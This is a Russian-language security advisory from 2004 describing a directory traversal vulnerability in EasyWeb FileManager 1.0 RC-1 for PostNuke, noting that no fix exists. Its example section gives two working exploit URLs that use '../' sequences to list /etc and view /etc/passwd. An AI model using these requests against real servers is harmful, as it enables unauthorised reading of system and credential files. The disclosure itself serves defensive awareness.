Уязвимость обхода каталога в EasyWeb FileManager for PostNuke

Дата публикации:
26.07.2004
Всего просмотров:
1169
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: EasyWeb FileManager 1.0 RC-1

Описание: Уязвимость обхода каталога в EasyWeb FileManager for PostNuke позволяет удаленному пользователю просматривать произвольные каталоги на целевой системе.

Пример/Эксплоит:

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/index.php?module=ew_filemanager&type=admin&func=manager&pa thext=../../../etc/&view=passwd

URL производителя:http://home.postnuke.ru/index.php?module=subjects&func=listcat&catid=2

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: EasyWeb FileManager Directory Traversal

или введите имя

CAPTCHA